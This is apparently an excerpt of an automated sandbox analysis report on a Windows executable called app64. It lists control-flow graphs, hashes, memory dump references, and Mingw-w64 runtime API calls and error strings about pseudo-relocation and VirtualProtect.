                                                                                                                                                                                • Instruction ID: 28431ffe2b43a5e2f28c3595d3054f2b55d7c3104603d8ebbaf3dc93f8b38c0d
                                                                                                                                                                                • Opcode Fuzzy Hash: e681a26ef7d4c24700de20a783a05b463d979f4231738b61a62c4fca5bd464eb
                                                                                                                                                                                • Instruction Fuzzy Hash: F322A176605BC989EB60DF26E8943DD37A4F749B98F808026DE4C5BB68DF39C2448750

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 388 7ff7df1146c6-7ff7df1146eb 389 7ff7df114790-7ff7df114794 388->389 390 7ff7df1146f1-7ff7df1146f6 388->390 389->390 393 7ff7df11479a 389->393 391 7ff7df1146f8-7ff7df1146fd 390->391 392 7ff7df11476f-7ff7df114779 390->392 396 7ff7df1146ff-7ff7df114707 391->396 397 7ff7df114720-7ff7df114725 391->397 394 7ff7df11477b-7ff7df114782 392->394 395 7ff7df1147a0-7ff7df1147a7 392->395 398 7ff7df11475d-7ff7df114767 393->398 394->389 396->398 399 7ff7df114709-7ff7df114714 396->399 400 7ff7df11472b 397->400 401 7ff7df114800-7ff7df114810 call 7ff7df1152d0 397->401 399->397 402 7ff7df114768-7ff7df11476d 400->402 403 7ff7df11472d-7ff7df114732 400->403 407 7ff7df11483b-7ff7df11484a signal 401->407 408 7ff7df114812-7ff7df114815 401->408 402->392 402->398 403->398 406 7ff7df114734-7ff7df114739 403->406 406->392 409 7ff7df11473b-7ff7df11474b signal 406->409 407->398 408->392 410 7ff7df11481b-7ff7df114822 408->410 411 7ff7df114827-7ff7df114836 signal 409->411 412 7ff7df114751-7ff7df114754 409->412 410->398 411->398 412->392 413 7ff7df114756 412->413 413->398
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2029869177.00007FF7DF111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DF110000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.2029080815.00007FF7DF110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030245412.00007FF7DF116000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030261792.00007FF7DF117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030276158.00007FF7DF11B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030289213.00007FF7DF11E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7df110000_app64.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: signal
                                                                                                                                                                                • String ID: CCG
                                                                                                                                                                                • API String ID: 1946981877-1584390748
                                                                                                                                                                                • Opcode ID: 8a6f48d48b306cdb4707a4a2155574e682621e979b55fd284b03ee4026067b58
                                                                                                                                                                                • Instruction ID: 16da10310cf8fdf6ba997bd748661112a41cb864473b26cbc301075c8b767daf
                                                                                                                                                                                • Opcode Fuzzy Hash: 8a6f48d48b306cdb4707a4a2155574e682621e979b55fd284b03ee4026067b58
                                                                                                                                                                                • Instruction Fuzzy Hash: 4A21E551E089D282FA64325574503FC918A9F87B54FD88437C52D8B3D9DF1EAAC68231
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2029869177.00007FF7DF111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DF110000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.2029080815.00007FF7DF110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030245412.00007FF7DF116000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030261792.00007FF7DF117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030276158.00007FF7DF11B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030289213.00007FF7DF11E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7df110000_app64.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b3eecf3cc2ff9d9f87b5c6d2b2abf88f6e0ff4afeccc00d1613f3841d670d489
                                                                                                                                                                                • Instruction ID: e4193b3aa1a968d3d8a7948c1021d05d2dd6432168a1ad1944ab4cd69a3c3585
                                                                                                                                                                                • Opcode Fuzzy Hash: b3eecf3cc2ff9d9f87b5c6d2b2abf88f6e0ff4afeccc00d1613f3841d670d489
                                                                                                                                                                                • Instruction Fuzzy Hash: 64513043A0D9D06CE7024BBA44601FD3FB1D71A78D70885D6EFE592A8EC52EC366A721
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2029869177.00007FF7DF111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DF110000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.2029080815.00007FF7DF110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030245412.00007FF7DF116000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030261792.00007FF7DF117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030276158.00007FF7DF11B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030289213.00007FF7DF11E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7df110000_app64.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c476249356c668f8ed4a002dffc240df0b99515dd8dffae56393f40610d44898
                                                                                                                                                                                • Instruction ID: cbbff8747886ce2ce966bc9e45edee5f2eb222f9e8e5fbed8068ffe354cf37c2
                                                                                                                                                                                • Opcode Fuzzy Hash: c476249356c668f8ed4a002dffc240df0b99515dd8dffae56393f40610d44898
                                                                                                                                                                                • Instruction Fuzzy Hash: B9518612B08AC05EE701D6F5C0503FD7AF6A759309F5881B6DE85A7F8BDA2ECA018730
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2030276158.00007FF7DF11B000.00000004.00000001.01000000.00000003.sdmp, Offset: 00007FF7DF110000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.2029080815.00007FF7DF110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2029869177.00007FF7DF111000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030245412.00007FF7DF116000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030261792.00007FF7DF117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030289213.00007FF7DF11E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7df110000_app64.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 860ae2f552153f1c35a4c44fe0010752e422381107d9e52d974b7837e55899d6
                                                                                                                                                                                • Instruction ID: 0838899fb74354f50ed3ad02a44fba61daed8ae594118fa8ce4ebdf048b4baa5
                                                                                                                                                                                • Opcode Fuzzy Hash: 860ae2f552153f1c35a4c44fe0010752e422381107d9e52d974b7837e55899d6
                                                                                                                                                                                • Instruction Fuzzy Hash: E3F04447C1EFC549F35359741C260AC5FA49B52D307CD826FCA58832D39A0E28099331
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2029869177.00007FF7DF111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DF110000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.2029080815.00007FF7DF110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030245412.00007FF7DF116000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030261792.00007FF7DF117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030276158.00007FF7DF11B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030289213.00007FF7DF11E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7df110000_app64.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 823ea4255f656836add987af6236b53aa2a0af5715962397abbb40deee8c70e9
                                                                                                                                                                                • Instruction ID: f9e7809743df7a0a0f8e82805901fb456b8125a1e3a51c02553dad1627ccf969
                                                                                                                                                                                • Opcode Fuzzy Hash: 823ea4255f656836add987af6236b53aa2a0af5715962397abbb40deee8c70e9
                                                                                                                                                                                • Instruction Fuzzy Hash: EFA00264A094519AF500BB5AB95086873B8FB44740B921475E40882111CA1ABC44C570
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2029869177.00007FF7DF111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DF110000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.2029080815.00007FF7DF110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030245412.00007FF7DF116000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030261792.00007FF7DF117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030276158.00007FF7DF11B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030289213.00007FF7DF11E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7df110000_app64.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9032faa40836cad7cc41d971de40eb0e7f821baddd720318af1d2fed103ad105
                                                                                                                                                                                • Instruction ID: d5d5318b121f07cbd89029edd1d9a4b3c7dd3b851a97904d070cc484801d2e1e
                                                                                                                                                                                • Opcode Fuzzy Hash: 9032faa40836cad7cc41d971de40eb0e7f821baddd720318af1d2fed103ad105
                                                                                                                                                                                • Instruction Fuzzy Hash: 2DA00224E0955196F500BB5EB9508687374FB44B40B914471E40C82121CA1BB8048560
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2029869177.00007FF7DF111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DF110000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.2029080815.00007FF7DF110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030245412.00007FF7DF116000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030261792.00007FF7DF117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030276158.00007FF7DF11B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030289213.00007FF7DF11E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7df110000_app64.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7d5e32ff633150ab6423a9a14a07e2a6f1277466500f1285c4b98c87af79ee81
                                                                                                                                                                                • Instruction ID: 3675849b9a30be1c2b0e78873ef6ac79661163e7a8c24e3eb30fed201a09b4b3
                                                                                                                                                                                • Opcode Fuzzy Hash: 7d5e32ff633150ab6423a9a14a07e2a6f1277466500f1285c4b98c87af79ee81
                                                                                                                                                                                • Instruction Fuzzy Hash: BAA0021284DC57C4E2005B01FC022BA922CE70A341FD82035C45C510518A2DB0054528
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2029869177.00007FF7DF111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DF110000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.2029080815.00007FF7DF110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030245412.00007FF7DF116000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030261792.00007FF7DF117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030276158.00007FF7DF11B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030289213.00007FF7DF11E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7df110000_app64.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2e5406043c02bd32327da19752404a8253ac7036c2a4e1b9491abe633dc8d0eb
                                                                                                                                                                                • Instruction ID: 5b97753959dea81f4beb94d36ac5f79fcff91bf1beb1754efcec8d6ab4876652
                                                                                                                                                                                • Opcode Fuzzy Hash: 2e5406043c02bd32327da19752404a8253ac7036c2a4e1b9491abe633dc8d0eb
                                                                                                                                                                                • Instruction Fuzzy Hash: 36A00268A0985196A501BB6EB8548686374FB44740B910071E40C82111CA1EB405C561
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2029869177.00007FF7DF111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DF110000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.2029080815.00007FF7DF110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030245412.00007FF7DF116000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030261792.00007FF7DF117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030276158.00007FF7DF11B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030289213.00007FF7DF11E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7df110000_app64.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1edaa336cccc6dc49b2997ca51f67de8901fbea8978a2fc686860136a9ea8bae
                                                                                                                                                                                • Instruction ID: d6b9d88b2b88907e6f6e43bd2f6ea033831d804a23b514f123019b98d0180192
                                                                                                                                                                                • Opcode Fuzzy Hash: 1edaa336cccc6dc49b2997ca51f67de8901fbea8978a2fc686860136a9ea8bae
                                                                                                                                                                                • Instruction Fuzzy Hash: 0AA00224A098519AB500BB6AF85486863B8FB44740B921075E40882111CA1EB4448561

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 198 7ff7df114140-7ff7df1141c3 call 7ff7df115230 call 7ff7df115258 __acrt_iob_func call 7ff7df114f40 call 7ff7df1152c8 208 7ff7df1141c9-7ff7df1141d7 198->208 209 7ff7df1142e0-7ff7df1142e2 198->209 210 7ff7df1141e0-7ff7df1141e6 208->210 211 7ff7df114208-7ff7df114216 call 7ff7df114c20 209->211 212 7ff7df1141e8-7ff7df1141f5 210->212 213 7ff7df1141fb-7ff7df114206 210->213 217 7ff7df11421c-7ff7df114264 call 7ff7df114d60 VirtualQuery 211->217 218 7ff7df114302-7ff7df11433d call 7ff7df114140 211->218 212->213 215 7ff7df114285-7ff7df11428c 212->215 213->210 213->211 224 7ff7df1142e7-7ff7df1142fd call 7ff7df114140 217->224 225 7ff7df11426a-7ff7df114274 217->225 227 7ff7df11433f-7ff7df11434f 218->227 228 7ff7df114350-7ff7df1143a7 call 7ff7df114ca0 call 7ff7df114f00 218->228 224->218 229 7ff7df11427e 225->229 230 7ff7df114276-7ff7df11427c 225->230 228->227 239 7ff7df1143a9-7ff7df1143af 228->239 229->215 230->229 232 7ff7df114290-7ff7df1142c6 VirtualProtect 230->232 232->229 234 7ff7df1142c8-7ff7df1142dc GetLastError call 7ff7df114140 232->234 234->209 240 7ff7df114538-7ff7df11453a 239->240 241 7ff7df1143b5-7ff7df1143b9 239->241 242 7ff7df114630-7ff7df114633 240->242 243 7ff7df114540-7ff7df114548 240->243 241->242 244 7ff7df1143bf 241->244 242->227 245 7ff7df114639 242->245 246 7ff7df11454e 243->246 247 7ff7df1143c2-7ff7df1143c4 243->247 244->247 249 7ff7df114640-7ff7df11465f call 7ff7df1141b0 245->249 250 7ff7df114560-7ff7df114563 246->250 247->242 248 7ff7df1143ca-7ff7df1143d0 247->248 251 7ff7df114672-7ff7df114692 call 7ff7df114140 248->251 252 7ff7df1143d6-7ff7df1143dd 248->252 264 7ff7df114661 249->264 254 7ff7df114569-7ff7df114578 250->254 255 7ff7df114666-7ff7df11466d call 7ff7df114140 250->255 266 7ff7df1146b9-7ff7df1146bd 251->266 267 7ff7df114694-7ff7df1146b8 251->267 252->227 257 7ff7df1143e3-7ff7df1143f4 252->257 260 7ff7df11457a-7ff7df11457d 254->260 261 7ff7df1145e0-7ff7df1145e8 call 7ff7df1141b0 254->261 255->251 263 7ff7df114453-7ff7df11446c 257->263 260->261 265 7ff7df11457f-7ff7df114593 call 7ff7df114140 260->265 273 7ff7df1145f0-7ff7df1145f8 261->273 268 7ff7df114598-7ff7df1145a3 263->268 269 7ff7df114472 263->269 264->255 265->268 267->266 268->273 274 7ff7df1145a5-7ff7df1145ba 268->274 269->250 275 7ff7df114478-7ff7df11447b 269->275 276 7ff7df1145fa 273->276 277 7ff7df1145bc-7ff7df1145bf 273->277 274->277 280 7ff7df1145cb-7ff7df1145d3 call 7ff7df1141b0 274->280 281 7ff7df11447d-7ff7df114480 275->281 282 7ff7df114400-7ff7df11440d 275->282 276->280 277->265 285 7ff7df1145c1-7ff7df1145c9 277->285 280->261 281->255 287 7ff7df114486-7ff7df114493 281->287 283 7ff7df114618-7ff7df114620 282->283 284 7ff7df114413-7ff7df114422 282->284 289 7ff7df114424-7ff7df11442b 283->289 290 7ff7df114626 283->290 288 7ff7df11443b-7ff7df11444d call 7ff7df1141b0 284->288 284->289 285->265 285->280 292 7ff7df114499-7ff7df1144a8 287->292 293 7ff7df114600-7ff7df114608 287->293 288->263 303 7ff7df1144e0-7ff7df1144e8 288->303 289->265 297 7ff7df114431-7ff7df114435 289->297 290->288 294 7ff7df1144aa-7ff7df1144b1 292->294 295 7ff7df1144c4-7ff7df1144d7 call 7ff7df1141b0 292->295 293->294 296 7ff7df11460e 293->296 294->265 299 7ff7df1144b7-7ff7df1144be 294->299 295->263 304 7ff7df1144dd 295->304 296->295 297->265 297->288 299->265 299->295 303->227 305 7ff7df1144ee-7ff7df1144fb 303->305 304->303 306 7ff7df114500-7ff7df114510 305->306 307 7ff7df11451f-7ff7df11452c 306->307 308 7ff7df114512-7ff7df11451d VirtualProtect 306->308 307->306 309 7ff7df11452e 307->309 308->307 309->227
                                                                                                                                                                                APIs
                                                                                                                                                                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,00000000,00007FF7DF114311,?,?,?,?,?,?,00007FF7DF117E88,00000000,?), ref: 00007FF7DF114190
                                                                                                                                                                                • VirtualQuery.KERNEL32 ref: 00007FF7DF11425B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2029869177.00007FF7DF111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DF110000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.2029080815.00007FF7DF110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030245412.00007FF7DF116000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030261792.00007FF7DF117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030276158.00007FF7DF11B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030289213.00007FF7DF11E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7df110000_app64.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: QueryVirtual__acrt_iob_func
                                                                                                                                                                                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                                                                                                                • API String ID: 4109086920-1534286854
                                                                                                                                                                                • Opcode ID: 5be0a1989cc6993cb9c51520042cc7c540774b1f4e4f800bd18ab7ee2128ab9d
                                                                                                                                                                                • Instruction ID: b79d43680782ddd4b1434430690305f49058de79e52c36148d4d1a255e3df0e3
                                                                                                                                                                                • Opcode Fuzzy Hash: 5be0a1989cc6993cb9c51520042cc7c540774b1f4e4f800bd18ab7ee2128ab9d
                                                                                                                                                                                • Instruction Fuzzy Hash: 96519672A04E9681EA10AB51F8406EDE768FB95B94FC44136DE4C07359DF3EE645C370

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 310 7ff7df114320-7ff7df11433d 311 7ff7df11433f-7ff7df11434f 310->311 312 7ff7df114350-7ff7df1143a7 call 7ff7df114ca0 call 7ff7df114f00 310->312 312->311 317 7ff7df1143a9-7ff7df1143af 312->317 318 7ff7df114538-7ff7df11453a 317->318 319 7ff7df1143b5-7ff7df1143b9 317->319 320 7ff7df114630-7ff7df114633 318->320 321 7ff7df114540-7ff7df114548 318->321 319->320 322 7ff7df1143bf 319->322 320->311 323 7ff7df114639 320->323 324 7ff7df11454e 321->324 325 7ff7df1143c2-7ff7df1143c4 321->325 322->325 327 7ff7df114640-7ff7df11465f call 7ff7df1141b0 323->327 328 7ff7df114560-7ff7df114563 324->328 325->320 326 7ff7df1143ca-7ff7df1143d0 325->326 329 7ff7df114672-7ff7df114692 call 7ff7df114140 326->329 330 7ff7df1143d6-7ff7df1143dd 326->330 342 7ff7df114661 327->342 332 7ff7df114569-7ff7df114578 328->332 333 7ff7df114666-7ff7df11466d call 7ff7df114140 328->333 344 7ff7df1146b9-7ff7df1146bd 329->344 345 7ff7df114694-7ff7df1146b8 329->345 330->311 335 7ff7df1143e3-7ff7df1143f4 330->335 338 7ff7df11457a-7ff7df11457d 332->338 339 7ff7df1145e0-7ff7df1145e8 call 7ff7df1141b0 332->339 333->329 341 7ff7df114453-7ff7df11446c 335->341 338->339 343 7ff7df11457f-7ff7df114593 call 7ff7df114140 338->343 351 7ff7df1145f0-7ff7df1145f8 339->351 346 7ff7df114598-7ff7df1145a3 341->346 347 7ff7df114472 341->347 342->333 343->346 345->344 346->351 352 7ff7df1145a5-7ff7df1145ba 346->352 347->328 353 7ff7df114478-7ff7df11447b 347->353 354 7ff7df1145fa 351->354 355 7ff7df1145bc-7ff7df1145bf 351->355 352->355 358 7ff7df1145cb-7ff7df1145d3 call 7ff7df1141b0 352->358 359 7ff7df11447d-7ff7df114480 353->359 360 7ff7df114400-7ff7df11440d 353->360 354->358 355->343 363 7ff7df1145c1-7ff7df1145c9 355->363 358->339 359->333 365 7ff7df114486-7ff7df114493 359->365 361 7ff7df114618-7ff7df114620 360->361 362 7ff7df114413-7ff7df114422 360->362 367 7ff7df114424-7ff7df11442b 361->367 368 7ff7df114626 361->368 366 7ff7df11443b-7ff7df11444d call 7ff7df1141b0 362->366 362->367 363->343 363->358 370 7ff7df114499-7ff7df1144a8 365->370 371 7ff7df114600-7ff7df114608 365->371 366->341 381 7ff7df1144e0-7ff7df1144e8 366->381 367->343 375 7ff7df114431-7ff7df114435 367->375 368->366 372 7ff7df1144aa-7ff7df1144b1 370->372 373 7ff7df1144c4-7ff7df1144d7 call 7ff7df1141b0 370->373 371->372 374 7ff7df11460e 371->374 372->343 377 7ff7df1144b7-7ff7df1144be 372->377 373->341 382 7ff7df1144dd 373->382 374->373 375->343 375->366 377->343 377->373 381->311 383 7ff7df1144ee-7ff7df1144fb 381->383 382->381 384 7ff7df114500-7ff7df114510 383->384 385 7ff7df11451f-7ff7df11452c 384->385 386 7ff7df114512-7ff7df11451d VirtualProtect 384->386 385->384 387 7ff7df11452e 385->387 386->385 387->311
                                                                                                                                                                                APIs
                                                                                                                                                                                • VirtualProtect.KERNEL32(00007FF7DF11A070,00007FF7DF11A078,00000001,?,?,?,?,00007FF8C6F6ADA0,00007FF7DF111228,?,?,?,00007FF7DF1113E6), ref: 00007FF7DF11451D
                                                                                                                                                                                Strings
                                                                                                                                                                                • Unknown pseudo relocation bit size %d., xrefs: 00007FF7DF114666
                                                                                                                                                                                • Unknown pseudo relocation protocol version %d., xrefs: 00007FF7DF114672
                                                                                                                                                                                • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF7DF114584
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2029869177.00007FF7DF111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DF110000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.2029080815.00007FF7DF110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030245412.00007FF7DF116000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030261792.00007FF7DF117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030276158.00007FF7DF11B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030289213.00007FF7DF11E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7df110000_app64.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                                                                                                                                • API String ID: 544645111-1286557213
                                                                                                                                                                                • Opcode ID: 98dd509f4e400133b53c28ef3403f132e0337064019af5a1f720a6282f56a420
                                                                                                                                                                                • Instruction ID: ade0c192ef0a48162ad78892ed0153d3fe6c7d0fecd25c7cbfbfe162437401d0
                                                                                                                                                                                • Opcode Fuzzy Hash: 98dd509f4e400133b53c28ef3403f132e0337064019af5a1f720a6282f56a420
                                                                                                                                                                                • Instruction Fuzzy Hash: 80918562E19DB385EA10AB15B4002FDA658AF52F64FC48233D92D177DCDF3EEA418670

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2029869177.00007FF7DF111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DF110000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.2029080815.00007FF7DF110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030245412.00007FF7DF116000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030261792.00007FF7DF117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030276158.00007FF7DF11B000.00000004.00000001.01000000.00000003.sdmpDownload File
